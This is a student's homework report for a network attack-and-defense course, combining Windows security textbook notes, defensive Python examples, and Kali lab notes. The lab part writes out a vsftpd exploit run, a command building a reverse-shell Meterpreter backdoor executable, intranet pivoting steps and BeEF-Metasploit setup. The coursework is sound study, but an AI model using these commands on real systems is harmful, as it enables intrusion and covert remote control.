20179301 "Network Attack and Defense Practice" Week 7 Homework

a. Study of Chapter 7 of the textbook "Network Attack and Defense Technology"

   Studied the content of Chapter 7, security attack and defense of the Windows operating system. Windows is currently the dominant operating system on the market; by 2010 it held 88% of the market share. Its basic structure is divided into the operating system kernel, which runs in the processor's privileged mode, and user-space code, which runs in the processor's non-privileged mode. Like UNIX, it is built on a monolithic kernel architecture, which also makes the system more susceptible to rootkits; to counter such attacks, digital signatures are used to improve security. In the Windows operating system there are three major categories of security principals: users, user groups, and computers; each security principal is identified by a SID (security identifier) that is globally unique in both space and time. Remote attack techniques against Windows fall into three categories: remote password guessing and cracking attacks, attacks on Windows network services, and attacks on Windows clients and users. Windows provides network users with remote access to file systems and printers through the file and print sharing service carried over the Server Message Block (SMB) protocol, so the SMB protocol has also become the channel through which attackers carry out remote password guessing. There are many tools that automate remote password guessing; popular ones include Legion, enum, and NTScan. After attackers have achieved their needs and goals on the target system, they usually also implant a remote control system to maintain control over the host, such as the command-line remote control tool Netcat or graphical remote control tools, the most famous of which is the VNC software.

Basic Framework of Windows Operating System

1. The basic structure of Windows is divided into the operating system kernel, which runs in the processor's privileged mode, and user code, which runs in the processor's non-privileged mode, i.e. kernel mode and user mode.
2. Kernel mode: the Windows executive, the Windows kernel, device drivers, the hardware abstraction layer, and the Windows windowing and graphics interface.
3. User mode: system support processes, environment subsystem service processes, service processes, user applications, and core subsystem DLLs.
4. Core mechanisms: process and thread management, memory management, file management, registry management, and network management.
5. Network management mechanism: network card hardware drivers (physical layer), the NDIS library and miniport drivers (link layer), the TDI transport layer with the network protocol drivers (network and transport layers), the network APIs and TDI clients (session and presentation layers), and network applications and service processes (application layer).

Security Architecture and Mechanisms

1. Reference monitor model: every access from a subject to an object is mediated by the reference monitor, which authorizes the access according to the security access control policy; all access records are written to the audit log by the monitor.
2. Core components: the SRM (Security Reference Monitor, in the kernel), the LSASS security service (user mode), winlogon/netlogon, and Eventlog.
3. Identity authentication mechanism. Security principals: users, user groups, computers. Authentication: local authentication (the winlogon process, the GINA graphical logon window and the LSASS service) and network authentication (NTLM, LanMan, Kerberos).
4. Authorization and access control mechanism. Objects: files, directories, registry keys and values, kernel objects, synchronization objects, private objects, pipes, memory, and communication interfaces. Attributes: Owner SID, Group SID, DACL (discretionary access control list), and SACL (system audit access control list).
5. Security audit mechanism.
6. Other security mechanisms: Security Center (firewall, automatic patch updates, virus protection), the IPsec loading and verification mechanism, the EFS encrypted file system, Windows File Protection, and the privacy protection and browser security mechanisms provided by the bundled IE browser.
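The SID described in item 3 above has a fixed binary layout inside security descriptors (Owner SID, Group SID, and each ACE in the DACL/SACL). The following is an added worked example, not code from the textbook or from this page, that decodes and re-encodes that layout and labels the principal where the SID alone allows it. The domain part of the sample SID is constructed; the well-known SIDs and RIDs (S-1-5-18, S-1-5-32-544, RID 500/512/513) are fixed values Windows assigns, which is also the caveat worth noticing: those are identical on every machine, so only account SIDs carry the globally unique per-domain or per-machine part the chapter mentions.

```python
import struct

# Layout of a binary SID (the form stored in a security descriptor's
# Owner/Group fields and in each ACE):
#   byte 0       revision (always 1)
#   byte 1       number of sub-authorities (at most 15)
#   bytes 2..7   48-bit identifier authority, big-endian (5 = NT authority)
#   then N x 4   sub-authorities, each 32-bit little-endian

# Constructed sample: a domain SID with the Domain Admins RID (512) appended.
# The three domain numbers after 21 are made up for this example.
SAMPLE_SID_BLOB = (
    b"\x01\x05"                                   # revision 1, five sub-authorities
    + b"\x00\x00\x00\x00\x00\x05"                 # identifier authority 5 (NT)
    + struct.pack("<5I", 21, 1004336348, 1177238915, 682003330, 512)
)

# SIDs that are identical on every Windows machine (so NOT globally unique,
# unlike account SIDs, which carry a per-domain or per-machine part).
WELL_KNOWN = {
    "S-1-1-0": "Everyone",
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-32-544": "BUILTIN\\Administrators",
}
# RIDs with a fixed meaning inside any domain or local SAM.
WELL_KNOWN_RIDS = {500: "built-in Administrator", 512: "Domain Admins", 513: "Domain Users"}


def sid_to_string(blob: bytes) -> str:
    """Decode a binary SID into its S-R-I-S... string form, validating the layout."""
    if len(blob) < 8:
        raise ValueError("SID shorter than its fixed header")
    revision, count = blob[0], blob[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if count > 15 or len(blob) != 8 + 4 * count:
        raise ValueError("SID length does not match its sub-authority count")
    authority = int.from_bytes(blob[2:8], "big")
    subs = struct.unpack("<%dI" % count, blob[8:])
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)


def string_to_sid(text: str) -> bytes:
    """Encode an S-1-... string back into the binary layout above."""
    parts = text.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError("not a SID string")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if revision != 1 or len(subs) > 15 or authority >= 1 << 48:
        raise ValueError("SID fields out of range")
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def is_valid_sid_blob(blob: bytes) -> bool:
    """True if the bytes decode as a well-formed SID (a quick sanity check for parsers)."""
    try:
        sid_to_string(blob)
        return True
    except ValueError:
        return False


def describe(sid: str) -> str:
    """Name the principal a SID denotes, as far as the SID alone allows."""
    if sid in WELL_KNOWN:
        return WELL_KNOWN[sid]
    parts = sid.split("-")
    # S-1-5-21-<a>-<b>-<c>[-<rid>]: a domain/machine SID, optionally plus an account RID
    if parts[:4] == ["S", "1", "5", "21"]:
        if len(parts) == 7:
            return "domain or machine SID (no account RID)"
        if len(parts) == 8:
            rid = int(parts[7])
            label = WELL_KNOWN_RIDS.get(
                rid, "ordinary account (RID >= 1000)" if rid >= 1000 else "reserved RID")
            return f"domain/machine principal, RID {rid}: {label}"
    return "unclassified SID"


if __name__ == "__main__":
    text = sid_to_string(SAMPLE_SID_BLOB)
    print(text, "->", describe(text))
    print(sid_to_string(b"\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00\x00\x00"), "->", describe("S-1-5-18"))
```

When reading SIDs out of a raw security descriptor, always check the length against the sub-authority count before trusting the sub-authorities: a truncated or oversized blob is the kind of malformed input a parser must reject rather than silently misread.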

Remote security attack and defense technology

1. Includes remote password guessing attacks, attacks on Windows network services, and attacks on Windows clients and users.
2. Life cycle: the process of discovering, exploiting and patching Windows security vulnerabilities. Public disclosure of vulnerability information: CVE, NVD, SecurityFocus, OSVDB. The penetration testing attack process against a specific target: vulnerability scanning, finding exploit code for the discovered vulnerabilities, and carrying out the penetration test. Using the Metasploit software for penetration testing: user interfaces (CLI, Console, web, GUI).
3. Remote password guessing attacks. Remote password guessing: the SMB protocol (tcp 445, tcp 139); other targets include the WMI service, TS remote desktop terminal services, the MySQL database service and SharePoint. Tools include Legion, enum, smbgrind, NTScan, XScan and Fluxay (流光). Eavesdropping on and cracking remote password exchanges: weaknesses of the NTLM, LanMan, NTLMv2 and Kerberos network authentication protocols. Defending against remote password guessing: shut down unnecessary and easily attacked network services, configure the host firewall to restrict certain port services, use the network firewall to restrict access to these services, disable the outdated and flawed LanMan and NTLM, and specify a strong password policy.
4. Remote penetration attacks on network services: well-known vulnerabilities and attacks against the NetBIOS service, against the SMB service, and against the MSRPC service; remote penetration attacks against Microsoft network services on Windows systems; and remote penetration attacks against third-party services on Windows systems. Countermeasures: most fundamentally, avoid and eliminate the security vulnerabilities in the service software that these penetration attacks depend on.
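The defenses listed in item 3 (restricting the services, disabling LanMan/NTLM, strong password policy) reduce the attack surface; the other half is noticing a guessing attack while it runs. The following is an added example, not from the textbook or this page, that runs a sliding-window detector over a constructed sample of Windows Security events (event 4625 = failed logon, 4624 = successful logon, logon type 3 = network logon, which is what SMB authentication produces). The simplified pipe-separated record format is an assumption made for the example; a real deployment would feed it from the exported event log. It distinguishes a single-account brute force from a password spray across accounts, and raises the most urgent case, a success from a source that had just been bursting failures.

```python
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample (not a real event log export), one event per line:
#   time|event_id|logon_type|account|source_ip
# 4625 = failed logon, 4624 = successful logon; logon type 3 = network (SMB etc.)
SAMPLE_EVENTS = """\
2024-03-01T10:00:01|4625|3|administrator|203.0.113.7
2024-03-01T10:00:03|4625|3|administrator|203.0.113.7
2024-03-01T10:00:04|4625|3|administrator|203.0.113.7
2024-03-01T10:00:06|4625|3|administrator|203.0.113.7
2024-03-01T10:00:08|4625|3|administrator|203.0.113.7
2024-03-01T10:00:09|4625|3|administrator|203.0.113.7
2024-03-01T10:00:15|4624|3|administrator|203.0.113.7
2024-03-01T10:01:00|4625|3|alice|198.51.100.4
2024-03-01T10:01:20|4625|3|alice|198.51.100.4
2024-03-01T10:02:00|4625|3|alice|203.0.113.9
2024-03-01T10:02:05|4625|3|bob|203.0.113.9
2024-03-01T10:02:10|4625|3|carol|203.0.113.9
2024-03-01T10:02:15|4625|3|dave|203.0.113.9
2024-03-01T10:02:20|4625|3|erin|203.0.113.9
2024-03-01T10:05:00|4624|2|alice|-
"""


def parse_events(text):
    """Parse the pipe-separated sample format into dicts with a real datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, ltype, account, ip = line.split("|")
        events.append({"time": datetime.fromisoformat(ts), "event_id": int(eid),
                       "logon_type": int(ltype), "account": account, "source_ip": ip})
    return events


def detect_password_guessing(events, threshold=5, window_seconds=60):
    """Flag source IPs with >= threshold network-logon failures inside a sliding window.

    Returns {source_ip: {"failures", "accounts", "kind", "success_after"}}.
    """
    recent = defaultdict(deque)   # ip -> (time, account) failures still inside the window
    flagged = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] != 3 or ev["source_ip"] == "-":
            continue              # only network logons with a source address matter here
        ip = ev["source_ip"]
        q = recent[ip]
        while q and (ev["time"] - q[0][0]).total_seconds() > window_seconds:
            q.popleft()           # expire failures that fell out of the window
        if ev["event_id"] == 4625:
            q.append((ev["time"], ev["account"]))
            if len(q) >= threshold:
                accounts = {a for _, a in q}
                alert = flagged.setdefault(ip, {"success_after": False})
                # many accounts from one source = spraying; one account = brute force
                alert.update(failures=len(q), accounts=len(accounts),
                             kind="password spray" if len(accounts) > 1 else "brute force")
        elif ev["event_id"] == 4624 and ip in flagged and q:
            # a success right after a burst of failures: treat as a probable compromise
            flagged[ip]["success_after"] = True
    return flagged


if __name__ == "__main__":
    for ip, alert in detect_password_guessing(parse_events(SAMPLE_EVENTS)).items():
        print(ip, alert)
```

The threshold and window are tuning knobs: too low and a user fumbling a password page triggers it (198.51.100.4 above stays under the bar), too high and a slow spray that stays below the rate slips through, which is why the per-source distinct-account count is tracked separately from the raw failure count.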

Local security attack and defense technology

1. Local privilege escalation attacks: exploit security defects and vulnerabilities in the operating system kernel and in programs started by privileged users; the root cause is that servers and desktop systems are not patched promptly.
2. Sensitive information theft. Windows password hash extraction techniques: copying the password hash file, backing it up with the rdisk tool, and extracting password hashes from the SAM file or Active Directory with pwdumpX. Windows password cracking techniques: L0phtCrack, John the Ripper, Cain. User sensitive data theft: find, findstr, grep, meterpreter. Defending against local sensitive information theft: choose strong, hard-to-crack passwords, use more secure algorithms for storing password hashes, and apply secure configuration policies.

Windows: eliminating traces

1. Eliminating traces: disabling the audit function and clearing the event logs. Countermeasures: set up system auditing and network service auditing in advance, and record the logs on non-erasable CD-ROM.
2. Remote control and backdoor programs. Remote control: command-line remote control tools (Netcat, psexec, meterpreter) and graphical remote control tools (VNC, Remote Admin, pcAnywhere). Backdoor programs: foreign (BO, BO2K) and domestic (冰河 (Glacier), 灰鸽子 (Gray Pigeon), 广外女生, PCshare, 磁碟机, 机器狗, etc.). Countermeasures: backdoor detection software, antivirus software, RootkitRevealer, IceSword.
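The countermeasure in item 1, writing logs to media that cannot be erased, works because an attacker who clears the event log cannot reach the copy. The same property can be obtained in software by hash-chaining the records and keeping only the latest chain head off-host (on the CD-ROM, a remote syslog server, or a printout). The following is an added example, not from the textbook or this page, using a constructed audit trail with real Windows event IDs (4719 audit policy changed, 4624 logon, 4672 special privileges assigned, 1102 audit log cleared). It shows which tampering the chain alone detects (edits, deletions in the middle) and which it does not (removing the tail), which is exactly the case the off-host head covers.

```python
import copy
import hashlib
import json

GENESIS = "0" * 64  # stands in for the "previous hash" of the very first entry


def _digest(prev: str, record: dict) -> str:
    """Hash of the previous link plus a canonical encoding of this record."""
    body = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev + "\n" + body).encode()).hexdigest()


def append_entry(chain: list, record: dict) -> str:
    """Append an audit record, binding it to the previous entry's hash; returns the new head."""
    prev = chain[-1]["hash"] if chain else GENESIS
    digest = _digest(prev, record)
    chain.append({"prev": prev, "record": record, "hash": digest})
    return digest  # the caller ships this head hash off-host after every write


def verify_chain(chain: list, expected_head: str = None):
    """Return (True, None) if every link holds and the head matches, else (False, index)."""
    prev = GENESIS
    for i, entry in enumerate(chain):
        if entry["prev"] != prev:
            return False, i          # an entry before i was removed or reordered
        if _digest(prev, entry["record"]) != entry["hash"]:
            return False, i          # entry i was edited in place
        prev = entry["hash"]
    if expected_head is not None and prev != expected_head:
        return False, len(chain)     # trailing entries were removed, or the log was wiped
    return True, None


def build_sample_chain():
    """Constructed sample audit trail (not a real Windows event log)."""
    chain = []
    records = [
        {"id": 4719, "msg": "system audit policy changed", "user": "SYSTEM"},
        {"id": 4624, "msg": "logon type 3", "user": "alice", "src": "198.51.100.4"},
        {"id": 4672, "msg": "special privileges assigned", "user": "alice"},
        {"id": 1102, "msg": "audit log cleared", "user": "alice"},
    ]
    head = None
    for r in records:
        head = append_entry(chain, r)
    return chain, head


def tampered_copy(chain: list, index: int, **changes) -> list:
    """Copy of the chain with fields of one record edited in place (simulated tampering)."""
    c = copy.deepcopy(chain)
    c[index]["record"].update(changes)
    return c


def without_entry(chain: list, index: int) -> list:
    """Copy of the chain with one entry deleted (simulated log editing)."""
    c = copy.deepcopy(chain)
    del c[index]
    return c


if __name__ == "__main__":
    chain, head = build_sample_chain()
    print("intact:", verify_chain(chain, head))
    print("edited entry 1:", verify_chain(tampered_copy(chain, 1, user="mallory"), head))
    print("entry 1 deleted:", verify_chain(without_entry(chain, 1), head))
    print("tail deleted, no head:", verify_chain(without_entry(chain, 3)))
    print("tail deleted, with head:", verify_chain(without_entry(chain, 3), head))
```

Without the off-host head, deleting the most recent entries (here the 1102 "audit log cleared" record itself) leaves a chain that still verifies, so the head must leave the host as soon as it is produced, not at the end of the day.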

b. Video learning

1. Retrieval and utilization of Kali exploits

1. searchsploit can search by keyword for vulnerability information and the exploit (exp) corresponding to each vulnerability, for example:
searchsploit wordpress

This lists the vulnerabilities and the file paths of their exploits; the listed files can then be opened for viewing, for example:

2. ikat automatically serves different exploits and waits for the target to visit.

3. termineter is used to assess the security of smart meters.

2. The Metasploit Foundation of Kali Vulnerability Exploitation

Metasploit is often used in penetration testing. This software includes many tools that form a complete attack framework.

1. Start the services. To use Metasploit in Kali, you need to start the PostgreSQL database service and the Metasploit service first; after that the msf database can be used to query exploits and records.
2. Path. The path of msf in Kali is /usr/share/metasploit-framework
3. Basic commands. msfpayload: used to generate payloads or shellcode; it supports searching, and the -o option lists the parameters a payload requires. msfencode: the encoder in msf, used in the early days to bypass AV (antivirus software) and now commonly used to encode msfpayload output so that exploits avoid bad characters. msfconsole: opens the Metasploit console; enter msfconsole to open msf.

msfpayload -l | grep "windows"   /* list the available payloads and keep only the Windows ones */



4. Test example: find vulnerabilities and search for an exploit.
nmap -sV 222.28.136.171

You can see that the ftp service is open on port 21 and the version is vsftpd 2.3.4. Is there a vulnerability in this version? Search in msf for a match:
search vsftpd

5. Test example: select the exploit and view its parameters

There was a small problem when entering the exploit. After checking, I found that I had made an input error. After correcting it, I entered the exploit and viewed its parameters correctly. I found that the RHOST parameter had not been set, and then set it:
set RHOST 222.28.136.171

6. Test example: select the payload

After setting it, check the parameters with show options; there are no further parameters to set.

8. Attack test: the attack can be carried out by entering exploit. If successful, a shell will be returned:

At this point you can view the id, the IP address, some file information, etc., since the permissions of the target host have been obtained.

3. Introduction to Meterpreter for Kali Vulnerability Exploitation


Generate the Meterpreter backdoor; open MSF and start the listener (select exploit/multi/handler); execute door.exe on the target machine; set the LHOST and LPORT parameters of reverse_tcp.
msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe   /* my own IP address is 222.28.136.234; LHOST and LPORT are the parameters of reverse_tcp and can be viewed in msf (remember to start the service first) */

Use exploit/multi/handler to receive the returned connection.


At this point, executing the backdoor generation command produces the door.exe file.

4. Metasploit post-penetration testing of Kali exploits

After the springboard (pivot host) obtains a certain level of authority, it is necessary to actively extend that authority to the intranet hosts, obtain the specified target information, and probe for system vulnerabilities. With the Meterpreter backdoor that msf has already obtained, this series of operations becomes easier.

1. View the current network card and network segment information (using ifconfig). You can see three network cards: one is the local network card, another is the network card we can access, and the third has an intranet IP (which cannot be accessed directly; you can try ping below).
2. Add a route: run autoroute -s 10.0.0.1, after which the modules in msf can attack or scan across network segments. Routes are quickly added via the autoroute script.
3. Open a socks proxy: create one with the auxiliary/server/socks4a module; it can be used with a browser, sqlmap, or nmap, so that intranet computers can be reached through the proxy.
4. You can switch between sessions freely with background and session -i.
5. Enter run to see the many commands available in meterpreter.
6. You can see the post-penetration testing modules through run post/.
7. Obtain intranet information: run arp_scanner -r 10.0.0.1/24
8. You can also upload files and perform port forwarding for subsequent testing, for example upload lcx.exe c:\\ transfers the file to the root directory of the C drive.

5. BeeF exploited by Kali


1. Start BeeF on the command line beef-xss


2. Suppose the host under test requests http://127.0.0.1:3000/demos/basic.html because of the XSS vulnerability.

At this time, there will be an online host on the left side of the page:




Here, the input is hello world, and the result returned below is success!

5. Proxy function
Select the target host, right-click, and choose Use as Proxy from the menu; then edit and send the request you want in Forge Request under the Rider tab.

6. BeEF does not load Metasploit by default. If you want to use Metasploit's rich attack modules, you need to do some configuration.
Default:

Configuration:
First open the beef xss directory

cd /usr/share/beef-xss/
ls
nano config.yaml  /* edit it; there is a lot of configuration information here, including the username and password, which can all be set in this file; here change the Metasploit entry from false to true */
clear


Make sure that the IP and other information here are set correctly (127.0.0.1 does not work; you need to use the local machine's IP), and modify the Custom path:

cd extensions/metasploit/
ls
nano config.yaml   /* change the IP on the host and callback_host lines to the local machine's IP, and change the custom path to /usr/share/metasploit-framework/ */

After configuration, open msfconsole and run the command:

load msgrpc ServerHost=222.28.136.234 Pass=abc123

Then run ./beef -x to reload the Metasploit exploit modules. After they are loaded, restart the service:

service beef-xss restart

At this time, visit the previous page again, and you find that you cannot connect. Wait a while and log in with the default username and password. I found that there are many more modules under Metasploit:
